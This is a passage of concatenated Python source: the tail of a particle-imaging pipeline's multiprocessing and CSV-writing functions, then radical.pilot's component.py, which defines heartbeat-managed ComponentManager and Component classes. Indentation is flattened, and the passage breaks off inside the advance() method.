outputQueue.put(None)
break
stats_all = processImage(nnmodel, class_labels, task, settings, logger, gui)
if (not stats_all is None):
outputQueue.put(stats_all)
else:
logger.debug('No stats found. skipping image.')
def distributor(inputQueue, outputQueue, config_filename, proc_list, gui=None):
'''
distributes the images in the input queue to the different loop processes
Args:
inputQueue () : queue where the images are added for processing
initilised using defineQueues()
outputQueue () : queue where information is retrieved from processing
initilised using defineQueues()
proc_list (list) : list of multiprocessing objects
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
numCores = max(1, multiprocessing.cpu_count() - 2)
for nbCore in range(numCores):
proc = multiprocessing.Process(target=loop, args=(config_filename, inputQueue, outputQueue, gui))
proc_list.append(proc)
proc.start()
def collector(inputQueue, outputQueue, datafilename, proc_list, testInputQueue,
settings, rts=None):
'''
collects all the results and write them into the stats.csv file
Args:
inputQueue () : queue where the images are added for processing
initilised using defineQueues()
outputQueue () : queue where information is retrieved from processing
initilised using defineQueues()
datafilename (str) : filename where processed data are written to csv
proc_list (list) : list of multiprocessing objects
testInputQueue (Bool) : if True function will keep collecting until inputQueue is empty
settings (PySilcamSettings) : Settings read from a .ini file
rts (Class): : Class for realtime stats
'''
countProcessFinished = 0
while ((outputQueue.qsize()>0) or (testInputQueue and inputQueue.qsize()>0)):
task = outputQueue.get()
if (task is None):
countProcessFinished = countProcessFinished + 1
if (len(proc_list) == 0): # no multiprocessing
break
# The collector can be stopped only after all loop processes are finished
elif (countProcessFinished == len(proc_list)):
break
continue
writeCSV(datafilename, task)
collect_rts(settings, rts, task)
def collect_rts(settings, rts, stats_all):
'''
Updater for realtime statistics
Args:
settings (PySilcamSettings) : Settings read from a .ini file
settings.logfile is optional
settings.loglevel mest exist
rts (Class) : Class for realtime stats
initialised using scog.rt_stats()
stats_all (DataFrame) : stats dataframe returned from processImage()
'''
if settings.Process.real_time_stats:
try:
rts.stats = rts.stats().append(stats_all)
except:
rts.stats = rts.stats.append(stats_all)
rts.update()
filename = os.path.join(settings.General.datafile,
'OilGasd50.csv')
rts.to_csv(filename)
def writeCSV(datafilename, stats_all):
'''
Writes particle stats into the csv ouput file
Args:
datafilename (str): filame prefix for -STATS.csv file that may or may not include a path
stats_all (DataFrame): stats dataframe returned from processImage()
'''
# create or append particle statistics to output file
# if the output file does not already exist, create it
# otherwise data will be appended
# @todo accidentally appending to an existing file could be dangerous
# because data will be duplicated (and concentrations would therefore
# double) GUI promts user regarding this - directly-run functions are more dangerous.
if not os.path.isfile(datafilename + '-STATS.csv'):
stats_all.to_csv(datafilename +
'-STATS.csv', index_label='particle index')
else:
stats_all.to_csv(datafilename + '-STATS.csv',
mode='a', header=False)
def check_path(filename):
'''Check if a path exists, and create it if not
Args:
filename (str): filame that may or may not include a path
'''
file = os.path.normpath(filename)
path = os.path.dirname(file)
if path:
if not os.path.isdir(path):
try:
os.makedirs(path)
except:
print('Could not create catalog:',path)
def configure_logger(settings):
'''Configure a logger according to the settings.
Args:
settings (PySilcamSettings): Settings read from a .ini file
settings.logfile is optional
settings.loglevel mest exist
'''
if settings.logfile:
check_path(settings.logfile)
logging.basicConfig(filename=settings.logfile,
level=getattr(logging, settings.loglevel))
else:
logging.basicConfig(level=getattr(logging, settings.loglevel))
def updatePathLength(settings, logger):
'''Adjusts the path length of systems with the actuator installed and RS232
connected.
Args:
settings (PySilcamSettings): Settings read from a .ini file
settings.logfile is optional
settings.loglevel mest exist
logger (logger object) : logger object created using
configure_logger()
'''
try:
logger.info('Updating path length')
pl = scog.PathLength(settings.PostProcess.com_port)
pl.gap_to_mm(settings.PostProcess.path_length)
pl.finish()
except:
logger.warning('Could not open port. Path length will not be adjusted.')
|
component.py
|
# pylint: disable=unused-argument # W0613 Unused argument 'timeout' & 'input'
# pylint: disable=redefined-builtin # W0622 Redefining built-in 'input'
import os
import sys
import copy
import time
import threading as mt
import radical.utils as ru
from .. import constants as rpc
from .. import states as rps
def out(msg):
sys.stdout.write('%s\n' % msg)
sys.stdout.flush()
# ------------------------------------------------------------------------------
#
class ComponentManager(object):
'''
RP spans a hierarchy of component instances: the application has a pmgr and
tmgr, and the tmgr has a staging component and a scheduling component, and
the pmgr has a launching component, and components also can have bridges,
etc. etc. This ComponentManager centralises the code needed to spawn,
manage and terminate such components - any code which needs to create
component should create a ComponentManager instance and pass the required
component and bridge layout and configuration. Callng `stop()` on the cmgr
will terminate the components and brisged.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg):
self._cfg = ru.Config('radical.pilot.cmgr', cfg=cfg)
self._sid = self._cfg.sid
self._uid = ru.generate_id('cmgr', ns=self._sid)
self._uids = [self._uid] # uids to track hartbeats for (incl. own)
self._prof = ru.Profiler(self._uid, ns='radical.pilot',
path=self._cfg.path)
self._log = ru.Logger(self._uid, ns='radical.pilot',
path=self._cfg.path)
self._prof.prof('init2', uid=self._uid, msg=self._cfg.path)
# Every ComponentManager runs a HB pubsub bridge in a separate thread.
# That HB channel should be used by all components and bridges created
# under this CMGR.
bcfg = ru.Config(cfg={'channel' : 'heartbeat',
'type' : 'pubsub',
'uid' : self._uid + '.hb',
'stall_hwm' : 1,
'bulk_size' : 0,
'path' : self._cfg.path})
self._hb_bridge = ru.zmq.PubSub(bcfg)
self._hb_bridge.start()
self._cfg.heartbeat.addr_pub = str(self._hb_bridge.addr_pub)
self._cfg.heartbeat.addr_sub = str(self._hb_bridge.addr_sub)
# runs a HB monitor on that channel
self._hb = ru.Heartbeat(uid=self.uid,
timeout=self._cfg.heartbeat.timeout,
interval=self._cfg.heartbeat.interval,
beat_cb=self._hb_beat_cb, # on every heartbeat
term_cb=self._hb_term_cb, # on termination
log=self._log)
self._hb_pub = ru.zmq.Publisher('heartbeat',
self._cfg.heartbeat.addr_pub,
log=self._log, prof=self._prof)
self._hb_sub = ru.zmq.Subscriber('heartbeat',
self._cfg.heartbeat.addr_sub,
topic='heartbeat', cb=self._hb_sub_cb,
log=self._log, prof=self._prof)
# confirm the bridge being usable by listening to our own heartbeat
self._hb.start()
self._hb.wait_startup(self._uid, self._cfg.heartbeat.timeout)
self._log.info('heartbeat system up')
# --------------------------------------------------------------------------
#
def _hb_sub_cb(self, topic, msg):
'''
keep track of heartbeats for all bridges/components we know
'''
# self._log.debug('hb_sub %s: get %s check', self.uid, msg['uid'])
if msg['uid'] in self._uids:
# self._log.debug('hb_sub %s: get %s used', self.uid, msg['uid'])
self._hb.beat(uid=msg['uid'])
# --------------------------------------------------------------------------
#
def _hb_beat_cb(self):
'''
publish own heartbeat on the hb channel
'''
self._hb_pub.put('heartbeat', msg={'uid' : self.uid})
# self._log.debug('hb_cb %s: put %s', self.uid, self.uid)
# --------------------------------------------------------------------------
#
def _hb_term_cb(self, uid=None):
self._log.debug('hb_term %s: %s died', self.uid, uid)
self._prof.prof('term', uid=self._uid)
# FIXME: restart goes here
# NOTE: returning `False` indicates failure to recover. The HB will
# terminate and suicidally kill the very process it is living in.
# Make sure all required cleanup is done at this point!
return None
# --------------------------------------------------------------------------
#
@property
def uid(self):
return self._uid
# --------------------------------------------------------------------------
#
@property
def cfg(self):
return self._cfg
# --------------------------------------------------------------------------
#
def start_bridges(self, cfg=None):
'''
check if any bridges are defined under `cfg['bridges']` and start them
'''
self._prof.prof('start_bridges_start', uid=self._uid)
timeout = self._cfg.heartbeat.timeout
if cfg is None:
cfg = self._cfg
for bname, bcfg in cfg.get('bridges', {}).items():
bcfg.uid = bname
bcfg.channel = bname
bcfg.cmgr = self.uid
bcfg.sid = cfg.sid
bcfg.path = cfg.path
bcfg.heartbeat = cfg.heartbeat
fname = '%s/%s.json' % (cfg.path, bcfg.uid)
bcfg.write(fname)
self._log.info('create bridge %s [%s]', bname, bcfg.uid)
out, err, ret = ru.sh_callout('radical-pilot-bridge %s' % fname)
self._log.debug('bridge startup out: %s', out)
self._log.debug('bridge startup err: %s', err)
if ret:
raise RuntimeError('bridge startup failed')
self._uids.append(bcfg.uid)
self._log.info('created bridge %s [%s]', bname, bcfg.uid)
# all bridges should start now, for their heartbeats
# to appear.
# self._log.debug('wait for %s', self._uids)
failed = self._hb.wait_startup(self._uids, timeout=timeout)
# self._log.debug('waited for %s: %s', self._uids, failed)
if failed:
raise RuntimeError('could not start all bridges %s' % failed)
self._prof.prof('start_bridges_stop', uid=self._uid)
# --------------------------------------------------------------------------
#
def start_components(self, cfg=None):
'''
check if any components are defined under `cfg['components']`
and start them
'''
self._prof.prof('start_components_start', uid=self._uid)
timeout = self._cfg.heartbeat.timeout
if cfg is None:
cfg = self._cfg
# we pass a copy of the complete session config to all components, but
# merge it into the component specific config settings (no overwrite),
# and then remove the `bridges` and `components` sections
#
scfg = ru.Config(cfg=cfg)
if 'bridges' in scfg: del(scfg['bridges'])
if 'components' in scfg: del(scfg['components'])
for cname, ccfg in cfg.get('components', {}).items():
for _ in range(ccfg.get('count', 1)):
ccfg.uid = ru.generate_id(cname, ns=self._sid)
ccfg.cmgr = self.uid
ccfg.kind = cname
ccfg.sid = cfg.sid
ccfg.base = cfg.base
ccfg.path = cfg.path
ccfg.heartbeat = cfg.heartbeat
ccfg.merge(scfg, policy=ru.PRESERVE, log=self._log)
fname = '%s/%s.json' % (cfg.path, ccfg.uid)
ccfg.write(fname)
self._log.info('create component %s [%s]', cname, ccfg.uid)
out, err, ret = ru.sh_callout('radical-pilot-component %s' % fname)
self._log.debug('out: %s' , out)
self._log.debug('err: %s' , err)
if ret:
raise RuntimeError('bridge startup failed')
self._uids.append(ccfg.uid)
self._log.info('created component %s [%s]', cname, ccfg.uid)
# all components should start now, for their heartbeats
# to appear.
failed = self._hb.wait_startup(self._uids, timeout=timeout * 10)
if failed:
raise RuntimeError('could not start all components %s' % failed)
self._prof.prof('start_components_stop', uid=self._uid)
# --------------------------------------------------------------------------
#
def close(self):
self._prof.prof('close', uid=self._uid)
self._hb_bridge.stop()
self._hb.stop()
# ------------------------------------------------------------------------------
#
class Component(object):
'''
This class provides the basic structure for any RP component which operates
on stateful things. It provides means to:
- define input channels on which to receive new things in certain states
- define work methods which operate on the things to advance their state
- define output channels to which to send the things after working on them
- define notification channels over which messages with other components
can be exchanged (publish/subscriber channels)
All low level communication is handled by the base class -- deriving classes
will register the respective channels, valid state transitions, and work
methods. When a 'thing' is received, the component is assumed to have full
ownership over it, and that no other component will change the 'thing's
state during that time.
The main event loop of the component -- `work()` -- is executed on `run()`
and will not terminate on its own, unless it encounters a fatal error.
Components inheriting this class should attempt not to use shared
resources. That will ensure that multiple instances of the component can
coexist for higher overall system throughput. Should access to shared
resources be necessary, it will require some locking mechanism across
process boundaries.
This approach should ensure that
- 'thing's are always in a well defined state;
- components are simple and focus on the semantics of 'thing' state
progression;
- no state races can occur on 'thing' state progression;
- only valid state transitions can be enacted (given correct declaration
of the component's semantics);
- the overall system is performant and scalable.
Inheriting classes SHOULD overload the following methods:
- `initialize()`:
- set up the component state for operation
- register input/output/notification channels
- register work methods
- register callbacks to be invoked on state notification
- the component will terminate if this method raises an exception.
- `work()`
- called in the main loop of the component process, on all entities
arriving on input channels. The component will *not* terminate if
this method raises an exception. For termination, `terminate()` must
be called.
- `finalize()`
- tear down the component (close threads, unregister resources, etc).
Inheriting classes MUST call the constructor:
class StagingComponent(rpu.Component):
def __init__(self, cfg, session):
rpu.Component.__init__(self, cfg, session)
A component thus must be passed a configuration (either as a path pointing
to a file name to be opened as `ru.Config`, or as a pre-populated
`ru.Config` instance). That config MUST contain a session ID (`sid`) for
the session under which to run this component, and a uid for the component
itself which MUST be unique within the scope of the given session. It MUST
further contain information about the session's heartbeat ZMQ pubsub channel
(`hb_pub`, `hb_sub`) on which heartbeats are sent and received for lifetime
management. All components and the session will continuously sent
heartbeat messages on that channel - missing heartbeats will by default lead
to session termination.
The config MAY contain `bridges` and `component` sections. If those exist,
the component will start the communication bridges and the components
specified therein, and is then considered an owner of those components and
bridges. As such, it much watch the HB channel for heartbeats from those
components, and must terminate itself if those go AWOL.
Further, the class must implement the registered work methods, with
a signature of:
work(self, things)
The method is expected to change the state of the 'thing's given. 'Thing's
will not be pushed to outgoing channels automatically -- to do so, the work
method has to call (see call documentation for other options):
self.advance(thing)
Until that method is called, the component is considered the sole owner of
the 'thing's. After that method is called, the 'thing's are considered
disowned by the component. If, however, components return from the work
methods without calling advance on the given 'thing's, then the component
keeps ownership of the 'thing's to advance it asynchronously at a later
point in time. That implies that a component can collect ownership over an
arbitrary number of 'thing's over time, and they can be advanced at the
component's discretion.
The component process is a stand-alone daemon process which runs outside of
Python's multiprocessing domain. As such, it can freely use Python's
multithreading (and it extensively does so by default) - but developers
should be aware that spawning additional *processes* in this component is
discouraged, as Python's process management is not playing well with it's
multithreading implementation.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
'''
This constructor MUST be called by inheriting classes, as it specifies
the operation mode of the component: components can spawn a child
process, or not.
If a child will be spawned later, then the child process state can be
initialized by overloading the`initialize()` method.
Note that this policy should be strictly followed by all derived
classes, as we will otherwise carry state over the process fork. That
can become nasty if the state included any form of locking (like, for
profiling or locking).
The symmetric teardown methods are called `finalize()`.
Constructors of inheriting components *may* call start() in their
constructor.
'''
# NOTE: a fork will not duplicate any threads of the parent process --
# but it will duplicate any locks which are shared between the
# parent process and its threads -- and those locks might be in
# any state at this point. As such, each child has to make
# sure to never, ever, use any of the inherited locks, but instead
# to create it's own set of locks in self.initialize.
self._cfg = cfg
self._uid = cfg.uid
self._session = session
# we always need an UID
assert(self._uid), 'Component needs a uid (%s)' % type(self)
# state we carry over the fork
self._debug = cfg.get('debug')
self._owner = cfg.get('owner', self.uid)
self._ctype = "%s.%s" % (self.__class__.__module__,
self.__class__.__name__)
self._number = cfg.get('number', 0)
self._name = cfg.get('name.%s' % self._number,
'%s.%s' % (self._ctype, self._number))
self._bridges = list() # communication bridges
self._components = list() # sub-components
self._inputs = dict() # queues to get things from
self._outputs = dict() # queues to send things to
self._workers = dict() # methods to work on things
self._publishers = dict() # channels to send notifications to
self._threads = dict() # subscriber and idler threads
self._cb_lock = ru.RLock('%s.cb_lock' % self._uid)
# guard threaded callback invokations
self._work_lock = ru.RLock('%s.work_lock' % self._uid)
# guard threaded callback invokations
self._subscribers = dict() # ZMQ Subscriber classes
if self._owner == self.uid:
self._owner = 'root'
self._prof = self._session._get_profiler(name=self.uid)
self._rep = self._session._get_reporter(name=self.uid)
self._log = self._session._get_logger (name=self.uid,
level=self._debug)
# self._prof.register_timing(name='component_lifetime',
# scope='uid=%s' % self.uid,
# start='component_start',
# stop='component_stop')
# self._prof.register_timing(name='entity_runtime',
# scope='entity',
# start='get',
# stop=['put', 'drop'])
self._prof.prof('init1', uid=self._uid, msg=self._prof.path)
self._q = None
self._in = None
self._out = None
self._poll = None
self._ctx = None
self._thread = None
self._term = mt.Event()
# --------------------------------------------------------------------------
#
def start(self):
sync = mt.Event()
self._thread = mt.Thread(target=self._worker_thread, args=[sync])
self._thread.daemon = True
self._thread.start()
while not sync.is_set():
if not self._thread.is_alive():
raise RuntimeError('worker thread died during initialization')
time.sleep(0.1)
assert(self._thread.is_alive())
# --------------------------------------------------------------------------
#
def _worker_thread(self, sync):
try:
self._initialize()
except Exception:
self._log.exception('worker thread initialization failed')
return
sync.set()
while not self._term.is_set():
try:
ret = self.work_cb()
if not ret:
break
except:
self._log.exception('work cb error [ignored]')
try:
self._finalize()
except Exception:
self._log.exception('worker thread finalialization failed')
# --------------------------------------------------------------------------
#
@staticmethod
def create(cfg, session):
# TODO: We keep this static typemap for component startup. The map
# should really be derived from rp module inspection via an
# `ru.PluginManager`.
#
from radical.pilot import worker as rpw
from radical.pilot import pmgr as rppm
from radical.pilot import tmgr as rptm
from radical.pilot import agent as rpa
from radical.pilot import raptor as rpt
# from radical.pilot import constants as rpc
comp = {
rpc.WORKER : rpt.Worker,
rpc.UPDATE_WORKER : rpw.Update,
rpc.STAGER_WORKER : rpw.Stager,
rpc.PMGR_LAUNCHING_COMPONENT : rppm.Launching,
rpc.TMGR_STAGING_INPUT_COMPONENT : rptm.Input,
rpc.TMGR_SCHEDULING_COMPONENT : rptm.Scheduler,
rpc.TMGR_STAGING_OUTPUT_COMPONENT : rptm.Output,
rpc.AGENT_STAGING_INPUT_COMPONENT : rpa.Input,
rpc.AGENT_SCHEDULING_COMPONENT : rpa.Scheduler,
rpc.AGENT_EXECUTING_COMPONENT : rpa.Executing,
rpc.AGENT_STAGING_OUTPUT_COMPONENT : rpa.Output
}
assert(cfg.kind in comp), '%s not in %s' % (cfg.kind, list(comp.keys()))
return comp[cfg.kind].create(cfg, session)
# --------------------------------------------------------------------------
#
def __str__(self):
return "%s <%s> [%s]" % (self.uid, self.__class__.__name__, self._owner)
# --------------------------------------------------------------------------
#
def _cancel_monitor_cb(self, topic, msg):
'''
We listen on the control channel for cancel requests, and append any
found UIDs to our cancel list.
'''
# FIXME: We do not check for types of things to cancel - the UIDs are
# supposed to be unique. That abstraction however breaks as we
# currently have no abstract 'cancel' command, but instead use
# 'cancel_tasks'.
self._log.debug('command incoming: %s', msg)
cmd = msg['cmd']
arg = msg['arg']
if cmd == 'cancel_tasks':
uids = arg['uids']
if not isinstance(uids, list):
uids = [uids]
self._log.debug('register for cancellation: %s', uids)
with self._cancel_lock:
self._cancel_list += uids
if cmd == 'terminate':
self._log.info('got termination command')
self.stop()
else:
self._log.debug('command ignored: %s', cmd)
return True
# --------------------------------------------------------------------------
#
@property
def cfg(self):
return copy.deepcopy(self._cfg)
@property
def session(self):
return self._session
@property
def uid(self):
return self._uid
@property
def ctype(self):
return self._ctype
# --------------------------------------------------------------------------
#
def _initialize(self):
'''
initialization of component base class goes here
'''
# components can always publish logs, state updates and control messages
# self.register_publisher(rpc.LOG_PUBSUB)
self.register_publisher(rpc.STATE_PUBSUB)
self.register_publisher(rpc.CONTROL_PUBSUB)
# set controller callback to handle cancellation requests
self._cancel_list = list()
self._cancel_lock = ru.RLock('%s.cancel_lock' % self._uid)
self.register_subscriber(rpc.CONTROL_PUBSUB, self._cancel_monitor_cb)
# call component level initialize
self.initialize()
self._prof.prof('component_init')
def initialize(self):
pass # can be overloaded
# --------------------------------------------------------------------------
#
def _finalize(self):
self._log.debug('_finalize()')
# call component level finalize, before we tear down channels
self.finalize()
for thread in self._threads.values():
thread.stop()
self._log.debug('%s close prof', self.uid)
try:
self._prof.prof('component_final')
self._prof.flush()
self._prof.close()
except Exception:
pass
def finalize(self):
pass # can be overloaded
# --------------------------------------------------------------------------
#
def stop(self, timeout=None): # noqa
'''
We need to terminate and join all threads, close all communication
channels, etc. But we trust on the correct invocation of the finalizers
to do all this, and thus here only forward the stop request to the base
class.
'''
# FIXME: implement timeout, or remove parameter
# (pylint W0613 should be removed if changes to timeout are applied)
self._log.info('stop %s (%s : %s) [%s]', self.uid, os.getpid(),
ru.get_thread_name(), ru.get_caller_name())
self._term.set()
# --------------------------------------------------------------------------
#
def register_input(self, states, input, worker=None):
'''
Using this method, the component can be connected to a queue on which
things are received to be worked upon. The given set of states (which
can be a single state or a list of states) will trigger an assert check
upon thing arrival.
This method will further associate a thing state with a specific worker.
Upon thing arrival, the thing state will be used to lookup the
respective worker, and the thing will be handed over. Workers should
call self.advance(thing), in order to push the thing toward the next
component. If, for some reason, that is not possible before the worker
returns, the component will retain ownership of the thing, and should
call advance() asynchronously at a later point in time.
Worker invocation is synchronous, ie. the main event loop will only
check for the next thing once the worker method returns.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
name = '%s.%s.%s' % (self.uid, worker.__name__,
'_'.join([str(s) for s in states]))
if name in self._inputs:
raise ValueError('input %s already registered' % name)
self._inputs[name] = {'queue' : self.get_input_ep(input),
'states' : states}
self._log.debug('registered input %s', name)
# we want exactly one worker associated with a state -- but a worker
# can be responsible for multiple states
for state in states:
self._log.debug('%s register input %s: %s', self.uid, state, name)
if state in self._workers:
self._log.warn("%s replaces worker %s (%s)"
% (self.uid, self._workers[state], state))
self._workers[state] = worker
self._log.debug('registered worker %s [%s]', worker.__name__, state)
# --------------------------------------------------------------------------
#
def unregister_input(self, states, input, worker):
'''
This methods is the inverse to the 'register_input()' method.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles statless entities
name = '%s.%s.%s' % (self.uid, worker.__name__,
'_'.join([str(s) for s in states]))
if name not in self._inputs:
self._log.warn('input %s not registered', name)
return
self._inputs[name]['queue'].stop()
del(self._inputs[name])
self._log.debug('unregistered input %s', name)
for state in states:
self._log.debug('%s unregister input %s (%s)', self.uid, name, state)
if state not in self._workers:
self._log.warn('%s input %s unknown', worker.__name__, state)
continue
del(self._workers[state])
# --------------------------------------------------------------------------
#
def register_output(self, states, output):
'''
Using this method, the component can be connected to a queue to which
things are sent after being worked upon. The given set of states (which
can be a single state or a list of states) will trigger an assert check
upon thing departure.
If a state but no output is specified, we assume that the state is
final, and the thing is then considered 'dropped' on calling advance() on
it. The advance() will trigger a state notification though, and then
mark the drop in the log. No other component should ever again work on
such a final thing. It is the responsibility of the component to make
sure that the thing is in fact in a final state.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
for state in states:
self._log.debug('%s register output %s:%s', self.uid, state, output)
# we want a *unique* output queue for each state.
if state in self._outputs:
self._log.warn("%s replaces output for %s : %s -> %s"
% (self.uid, state, self._outputs[state], output))
if not output:
# this indicates a final state
self._log.debug('%s register output to None %s', self.uid, state)
self._outputs[state] = None
else:
# non-final state, ie. we want a queue to push to:
self._outputs[state] = self.get_output_ep(output)
# --------------------------------------------------------------------------
#
def get_input_ep(self, input):
'''
return an input endpoint
'''
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, input)
cfg = ru.read_json(fname)
return ru.zmq.Getter(input, url=cfg['get'])
# --------------------------------------------------------------------------
#
def get_output_ep(self, output):
'''
return an output endpoint
'''
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, output)
cfg = ru.read_json(fname)
return ru.zmq.Putter(output, url=cfg['put'])
# --------------------------------------------------------------------------
#
def unregister_output(self, states):
'''
this removes any outputs registerd for the given states.
'''
states = ru.as_list(states)
if not states:
states = [None] # worker handles stateless entities
for state in states:
self._log.debug('TERM : %s unregister output %s', self.uid, state)
if state not in self._outputs:
self._log.warn('state %s has no output registered', state)
# raise ValueError('state %s has no output registered' % state)
continue
del(self._outputs[state])
self._log.debug('unregistered output for %s', state)
# --------------------------------------------------------------------------
#
def output(self, things, state=None):
'''
this pushes the given things to the output queue register for the given
state
'''
# NOTE: we do not check if things are actually in the given state
things = ru.as_list(things)
if not things:
# nothing to do
return
if state not in self._outputs:
raise ValueError('state %s has no output registered' % state)
if self._outputs[state]:
# the bridge will sort things into bulks, wit bulk size dependig on
# bridge configuration
self._outputs[state].put(things)
# --------------------------------------------------------------------------
#
def register_timed_cb(self, cb, cb_data=None, timer=None):
'''
Idle callbacks are invoked at regular intervals -- they are guaranteed
to *not* be called more frequently than 'timer' seconds, no promise is
made on a minimal call frequency. The intent for these callbacks is to
run lightweight work in semi-regular intervals.
'''
name = "%s.idler.%s" % (self.uid, cb.__name__)
self._log.debug('START: %s register idler %s', self.uid, name)
with self._cb_lock:
if name in self._threads:
raise ValueError('cb %s already registered' % cb.__name__)
if timer is None: timer = 0.0 # NOTE: busy idle loop
else : timer = float(timer)
# create a separate thread per idle cb, and let it be watched by the
# ru.Process base class
#
# ------------------------------------------------------------------
# NOTE: idle timing is a tricky beast: if we sleep for too long,
# then we have to wait that long on stop() for the thread to
# get active again and terminate/join. So we always sleep
# just a little, and explicitly check if sufficient time has
# passed to activate the callback.
class Idler(mt.Thread):
# --------------------------------------------------------------
def __init__(self, name, log, timer, cb, cb_data, cb_lock):
self._name = name
self._log = log
self._timeout = timer
self._cb = cb
self._cb_data = cb_data
self._cb_lock = cb_lock
self._last = 0.0
self._term = mt.Event()
super(Idler, self).__init__()
self.daemon = True
self.start()
def stop(self):
self._term.set()
def run(self):
try:
self._log.debug('start idle thread: %s', self._cb)
ret = True
while ret and not self._term.is_set():
if self._timeout and \
self._timeout > (time.time() - self._last):
# not yet
time.sleep(0.1) # FIXME: make configurable
continue
with self._cb_lock:
if self._cb_data is not None:
ret = self._cb(cb_data=self._cb_data)
else:
ret = self._cb()
if self._timeout:
self._last = time.time()
except:
self._log.exception('idle thread failed: %s', self._cb)
# ------------------------------------------------------------------
idler = Idler(name=name, timer=timer, log=self._log,
cb=cb, cb_data=cb_data, cb_lock=self._cb_lock)
self._threads[name] = idler
self._log.debug('%s registered idler %s', self.uid, name)
# --------------------------------------------------------------------------
#
def unregister_timed_cb(self, cb):
'''
This method is reverts the register_timed_cb() above: it
removes an idler from the component, and will terminate the
respective thread.
'''
name = "%s.idler.%s" % (self.uid, cb.__name__)
self._log.debug('TERM : %s unregister idler %s', self.uid, name)
with self._cb_lock:
if name not in self._threads:
self._log.warn('timed cb %s is not registered', name)
# raise ValueError('%s is not registered' % name)
return
self._threads[name].stop() # implies join
del(self._threads[name])
self._log.debug("TERM : %s unregistered idler %s", self.uid, name)
# --------------------------------------------------------------------------
#
def register_publisher(self, pubsub):
'''
Using this method, the component can registered itself to be a publisher
of notifications on the given pubsub channel.
'''
assert(pubsub not in self._publishers)
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, pubsub)
cfg = ru.read_json(fname)
self._publishers[pubsub] = ru.zmq.Publisher(channel=pubsub,
url=cfg['pub'],
log=self._log,
prof=self._prof)
self._log.debug('registered publisher for %s', pubsub)
# --------------------------------------------------------------------------
#
def register_subscriber(self, pubsub, cb):
'''
This method is complementary to the register_publisher() above: it
registers a subscription to a pubsub channel. If a notification
is received on thag channel, the registered callback will be
invoked. The callback MUST have one of the signatures:
callback(topic, msg)
where 'topic' is set to the name of the pubsub channel.
The subscription will be handled in a separate thread, which implies
that the callback invocation will also happen in that thread. It is the
caller's responsibility to ensure thread safety during callback
invocation.
'''
# dig the addresses from the bridge's config file
fname = '%s/%s.cfg' % (self._cfg.path, pubsub)
cfg = ru.read_json(fname)
if pubsub not in self._subscribers:
self._subscribers[pubsub] = ru.zmq.Subscriber(channel=pubsub,
url=cfg['sub'],
log=self._log,
prof=self._prof)
self._subscribers[pubsub].subscribe(topic=pubsub, cb=cb,
lock=self._cb_lock)
# --------------------------------------------------------------------------
#
def work_cb(self):
'''
This is the main routine of the component, as it runs in the component
process. It will first initialize the component in the process context.
Then it will attempt to get new things from all input queues
(round-robin). For each thing received, it will route that thing to the
respective worker method. Once the thing is worked upon, the next
attempt on getting a thing is up.
'''
# if there is nothing to check, idle a bit
if not self._inputs:
time.sleep(0.1)
return True
for name in self._inputs:
input = self._inputs[name]['queue']
states = self._inputs[name]['states']
# FIXME: a simple, 1-thing caching mechanism would likely
# remove the req/res overhead completely (for any
# non-trivial worker).
things = input.get_nowait(500) # in microseconds
things = ru.as_list(things)
if not things:
# return to have a chance to catch term signals
return True
# the worker target depends on the state of things, so we
# need to sort the things into buckets by state before
# pushing them
buckets = dict()
for thing in things:
state = thing.get('state') # can be stateless
uid = thing.get('uid') # and not have uids
self._prof.prof('get', uid=uid, state=state)
if state not in buckets:
buckets[state] = list()
buckets[state].append(thing)
# We now can push bulks of things to the workers
for state,things in buckets.items():
assert(state in states), 'cannot handle state %s' % state
assert(state in self._workers), 'no worker for state %s' % state
try:
to_cancel = list()
for thing in things:
uid = thing.get('uid')
# FIXME: this can become expensive over time
# if the cancel list is never cleaned
if uid and uid in self._cancel_list:
with self._cancel_lock:
self._cancel_list.remove(uid)
to_cancel.append(thing)
self._log.debug('got %s (%s)', uid, state)
if to_cancel:
# only advance stateful entities, otherwise just drop
if state:
self.advance(to_cancel, rps.CANCELED, publish=True,
push=False)
with self._work_lock:
self._workers[state](things)
except Exception:
# this is not fatal -- only the 'things' fail, not
# the component
self._log.exception("work %s failed", self._workers[state])
if state:
self.advance(things, rps.FAILED, publish=True,
push=False)
# keep work_cb registered
return True
# --------------------------------------------------------------------------
#
def advance(self, things, state=None, publish=True, push=False, ts=None,
prof=True):
'''
Things which have been operated upon are pushed down into the queues
again, only to be picked up by the next component, according to their
state model. This method will update the thing state, and push it into
the output queue registered as target for that state.
things: list of things to advance
state: new state to set for the things
publish: determine if state update notifications should be issued
push: determine if things should be pushed to outputs
prof: determine if state advance creates a profile event
(publish, and push are always profiled)
'Things' are expected to be a dictionary, and to have 'state', 'uid' and
optionally 'type' set.
If 'thing' contains an '$all' key, the complete dict is published;
otherwise, *only the state* is published.
This is evaluated in self.publish.
'''
if not things:
return
if not ts:
ts = time.time()
things = ru.as_list(things)
self._log.debug('advance bulk: %s [%s, %s]', len(things), push, publish)
# assign state, sort things by state
buckets = dict()
for thing in things:
uid = thing['uid']
# if thing['type'] not in ['task', 'pilot']:
# raise TypeError("thing has unknown type (%s)" % uid)
if state:
# state advance done here
thing['state'] = state
_state = thing['state']
if prof:
self._prof.prof('advance', uid=uid, state=_state, ts=ts)
if _state not in buckets:
buckets[_state] = list()
buckets[_state].append(thing)
# should we publish state information on the state pubsub?
if publish:
to_publish = list()
# If '$all' is set, we update the complete thing_dict.
# Things in final state are also published in full.
# If '$set' is set, we also publish all keys listed in there.
# In all other cases, we only send 'uid', 'type' and 'state'.
for thing in things:
if '$all' in thing:
del(thing['$all'])
if '$set' in thing:
del(thing['$set'])
to_publish.append(thing)
elif thing['state'] in rps.FINAL:
to_publish.append(thing)
else:
tmp = {'uid' : thing['uid'],
'type' : thing['type'],
'state' : thing['state']}
if '$set' in thing:
for key in thing['$set']:
tmp[key] = thing[key]
del(thing['$set'])
to_publish.append(tmp)
self.publish(rpc.STATE_PUBSUB, {'cmd': 'update', 'arg': to_publish})
# ts = time.time()
# for thing in things:
